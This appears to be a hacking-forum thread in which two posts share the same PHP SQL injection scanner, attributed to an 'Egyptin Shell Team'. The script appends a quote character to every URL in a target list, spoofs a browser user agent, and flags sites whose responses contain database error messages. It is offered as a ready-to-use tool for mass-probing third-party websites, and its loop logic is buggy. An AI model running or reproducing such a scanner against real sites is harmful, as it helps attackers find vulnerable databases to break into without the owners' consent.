PHP Sql Injection Multi Scanner (1 Viewer)

Joined
Jul 7, 2018
Credits
0
Rating - 0%
View hidden content is available for registered users!

Code:
<?php

set_time_limit(0);

error_reporting(0);


//Put All sites in sites.txt, on this form => http://www.target.com/page.php?id=1 OR http://www.target.com/page.php?id=


echo "

   _____       _   _____       _           _   _                _____                                 

  / ____|     | | |_   _|     (_)         | | (_)              / ____|                               

 | (___   __ _| |   | |  _ __  _  ___  ___| |_ _  ___  _ __   | (___   ___ __ _ _ __  _ __   ___ _ __

  \___ \ / _` | |   | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \   \___ \ / __/ _` | '_ \| '_ \ / _ \ '__|

  ____) | (_| | |  _| |_| | | | |  __/ (__| |_| | (_) | | | |  ____) | (_| (_| | | | | | | |  __/ |   

 |_____/ \__, |_| |_____|_| |_| |\___|\___|\__|_|\___/|_| |_| |_____/ \___\__,_|_| |_|_| |_|\___|_|   

            | |              _/ |                                                                     

            |_|             |__/                                                                     

[*]-----------------------------------------------------------------------[*]

[+] Tool                 : Sql Injection Scanner Script       

[+] Coded By             : s0w

[+] Skype                : saw_hacker

[+] Facebook             : https://www.facebook.com/s0w.egy

[*]-----------------------------------------------------------------------[*]

";

     print "\nUsage : php sql.php | [~] You must create 'sites.txt' To work Tool ...\n";


function s0w_save($get){

        $s0w = fopen("result.txt","a+");

        fwrite($s0w,"$get\n");

        fclose($s0w);

}

        $s0w = @file_get_contents($argv{1});

        $url = @file_get_contents ("sites.txt");

        $ex = "%27";

       

if(!file_exists("sites.txt")) {

   die("\n[-] Couldn't find "." sites.txt" ."\n" ."Please Make it To run Script..\n");

}


if(isset($s0w)){

        echo "\n";

        echo "\n[+] Scanner/Exploit Running ~\n";

        echo "\n+++++++++++++++++++++++++++++++++++++";   

        echo "\n";   

       

        $exploits = explode("\n", $url);

foreach ($exploits as $exploit){   

        $exploit = @trim($exploit);

        $get = $exploit.$ex;

       

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $get);

        curl_setopt($ch, CURLOPT_HEADER, TRUE);

        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

        $result =curl_exec($ch);

        curl_close($ch);

       

$errors = array (

'You have an error in your SQL syntax;',

'Warning: mysql_fetch_array',

'supplied argument is not a valid MySQL result resource in',

'There was an error querying the database.',

'Warning: mysql_fetch_row():',

'Division by zero in',

'Call to a member function',

'Microsoft JET Database',

'Microsoft OLE DB Provider for SQL Server',

'Unclosed quotation mark',

'Microsoft OLE DB Provider for Oracle',

'Incorrect syntax near',

'SQL query failed',

'mysql_fetch_object()',

'argument is not a valid MySQL|Syntax error',

'Fatal error',

'mysql_num_rows()',

'execute query',

'mysql_num_rows()',

'mysql_error',

'error'

);


foreach ($errors as $error) {

    if (eregi($error, $result)){

    echo "\n[+] SQL Found => $get\n";

    echo "\n";

s0w_save($get);

break 1;

    }else{       

    echo "\n";   

    echo "\n-------------------------------------------------------------------";

    echo "\n[-] Not Found => $exploit\n";

    echo "\n[*] Result Save in result.txt\n";

break 3;

    }

    }

    }

break 2;

}

//Coded by s0w - Egyptin Shell Team

?>
 
Joined
May 9, 2019
Credits
0
Rating - 0%
View hidden content is available for registered users!

Code:
<?php

set_time_limit(0);

error_reporting(0);


//Put All sites in sites.txt, on this form => http://www.target.com/page.php?id=1 OR http://www.target.com/page.php?id=


echo "

   _____       _   _____       _           _   _                _____                                

  / ____|     | | |_   _|     (_)         | | (_)              / ____|                              

 | (___   __ _| |   | |  _ __  _  ___  ___| |_ _  ___  _ __   | (___   ___ __ _ _ __  _ __   ___ _ __

  \___ \ / _` | |   | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \   \___ \ / __/ _` | '_ \| '_ \ / _ \ '__|

  ____) | (_| | |  _| |_| | | | |  __/ (__| |_| | (_) | | | |  ____) | (_| (_| | | | | | | |  __/ |  

 |_____/ \__, |_| |_____|_| |_| |\___|\___|\__|_|\___/|_| |_| |_____/ \___\__,_|_| |_|_| |_|\___|_|  

            | |              _/ |                                                                    

            |_|             |__/                                                                    

[*]-----------------------------------------------------------------------[*]

[+] Tool                 : Sql Injection Scanner Script      

[+] Coded By             : s0w

[+] Skype                : saw_hacker

[+] Facebook             : https://www.facebook.com/s0w.egy

[*]-----------------------------------------------------------------------[*]

";

     print "\nUsage : php sql.php | [~] You must create 'sites.txt' To work Tool ...\n";


function s0w_save($get){

        $s0w = fopen("result.txt","a+");

        fwrite($s0w,"$get\n");

        fclose($s0w);

}

        $s0w = @file_get_contents($argv{1});

        $url = @file_get_contents ("sites.txt");

        $ex = "%27";

      

if(!file_exists("sites.txt")) {

   die("\n[-] Couldn't find "." sites.txt" ."\n" ."Please Make it To run Script..\n");

}


if(isset($s0w)){

        echo "\n";

        echo "\n[+] Scanner/Exploit Running ~\n";

        echo "\n+++++++++++++++++++++++++++++++++++++";  

        echo "\n";  

      

        $exploits = explode("\n", $url);

foreach ($exploits as $exploit){  

        $exploit = @trim($exploit);

        $get = $exploit.$ex;

      

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $get);

        curl_setopt($ch, CURLOPT_HEADER, TRUE);

        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

        $result =curl_exec($ch);

        curl_close($ch);

      

$errors = array (

'You have an error in your SQL syntax;',

'Warning: mysql_fetch_array',

'supplied argument is not a valid MySQL result resource in',

'There was an error querying the database.',

'Warning: mysql_fetch_row():',

'Division by zero in',

'Call to a member function',

'Microsoft JET Database',

'Microsoft OLE DB Provider for SQL Server',

'Unclosed quotation mark',

'Microsoft OLE DB Provider for Oracle',

'Incorrect syntax near',

'SQL query failed',

'mysql_fetch_object()',

'argument is not a valid MySQL|Syntax error',

'Fatal error',

'mysql_num_rows()',

'execute query',

'mysql_num_rows()',

'mysql_error',

'error'

);


foreach ($errors as $error) {

    if (eregi($error, $result)){

    echo "\n[+] SQL Found => $get\n";

    echo "\n";

s0w_save($get);

break 1;

    }else{      

    echo "\n";  

    echo "\n-------------------------------------------------------------------";

    echo "\n[-] Not Found => $exploit\n";

    echo "\n[*] Result Save in result.txt\n";

break 3;

    }

    }

    }

break 2;

}

//Coded by s0w - Egyptin Shell Team

?>
 

Users who are viewing this thread

Top